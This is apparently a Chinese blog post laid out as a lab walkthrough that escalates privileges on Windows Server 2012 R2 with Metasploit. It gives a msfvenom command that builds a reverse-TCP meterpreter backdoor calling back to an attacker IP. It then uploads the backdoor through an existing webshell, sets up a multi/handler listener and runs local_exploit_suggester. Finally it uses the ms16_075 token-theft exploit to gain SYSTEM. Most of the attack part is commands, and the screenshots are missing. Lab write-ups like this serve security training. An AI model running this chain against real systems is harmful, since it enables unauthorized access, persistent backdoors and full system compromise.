利用MSF溢出漏洞提权windows server2012

实验内容

使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。
在此之前已经上传一句话取得admin权限,在自己虚拟机做演示,大家通常取得的权限可能会比admin低,但也是可以进行以下提权的,这里要把目标提权至system权限。

实验环境

kalil inux

在这里插入图片描述

Windows Server 2012 R2
在这里插入图片描述

开始实验

下载https://github.com/chroblert/WindowsVulnScan
在这里插入图片描述
使用powershell运行KBCollect.ps,生成KB.json
在这里插入图片描述
在这里插入图片描述
修改KB.json编码格式
在这里插入图片描述
这里我把文档拿到了本机进行测试
执行脚本,可能会报错,pip install requests 下载即可
在这里插入图片描述
成功执行
在这里插入图片描述

查看具有公开EXP的CVE

python cve-check.py -C -f KB.json

在这里插入图片描述
生成反弹后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.139 LPORT=3333 -f exe -o msf.exe

在这里插入图片描述
使用蚁剑连接并上传后门程序
在这里插入图片描述
配置监听会话

msfconsole

在这里插入图片描述
开启监听

use exploit/multi/handler

在这里插入图片描述
启动后门
在这里插入图片描述
成功监听
在这里插入图片描述
查看当前权限getuid
在这里插入图片描述
切换出来为后续使用自动漏洞模块做准备

meterpreter > background

在这里插入图片描述
使用MSF post/multi/recon/local_exploit_suggester模块快速识别系统中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

在这里插入图片描述

show options 

在这里插入图片描述

set showdescription  true

设置会话为1
在这里插入图片描述
run
在这里插入图片描述
使用ms16_075令牌窃取提权

use exploit/windows/local/ms16_075_reflection_juicy

在这里插入图片描述
set session 1
在这里插入图片描述
run
在这里插入图片描述
getuid
在这里插入图片描述
提权成功

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值